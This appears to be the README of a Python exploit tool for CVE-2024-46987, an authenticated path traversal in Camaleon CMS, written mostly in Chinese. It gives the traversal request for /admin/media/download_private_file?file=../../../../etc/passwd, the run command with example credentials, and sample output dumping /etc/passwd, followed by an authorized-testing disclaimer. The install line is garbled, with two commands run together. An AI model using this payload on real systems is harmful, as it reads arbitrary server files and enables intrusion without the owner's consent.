
Exploit created using Python
CVE-2024-46987 是 Camaleon CMS(一个基于 Ruby on Rails 的内容管理系统)中的一个 经过认证的路径遍历漏洞(CWE-22)。它允许已登录用户(即使权限较低)通过 MediaController#download_private_file 操作读取服务器上的任意文件。
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N拥有有效凭据的攻击者可以向以下端点发送精心构造的请求:/admin/media/download_private_file?file=../../../../etc/passwd
pip install -r requirements.txt或者
pip install -r requests firepython cms-exploit.py \
--url http://target.local \
--username neal \
--password 'Caffery@123' \
--cmd /etc/passwd
[+] 登录成功
[*] 正在请求:http://target.local/admin/media/download_private_file?file=../../../etc/passwd
[+] 成功 – 内容:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
.
.
注意:该脚本假设使用 Rails 风格的登录表单(user[email],user[password],authenticity_token)。如果你的目标使用自定义字段名称,请调整载荷字段。
本工具仅用于教育和授权的安全测试目的。
仅在你拥有所有权或已获得明确书面许可的系统上使用(例如,漏洞赏金计划、内部渗透测试、HTB 等实验室)。 未经授权使用可能违反法律。 作者不对滥用行为负责。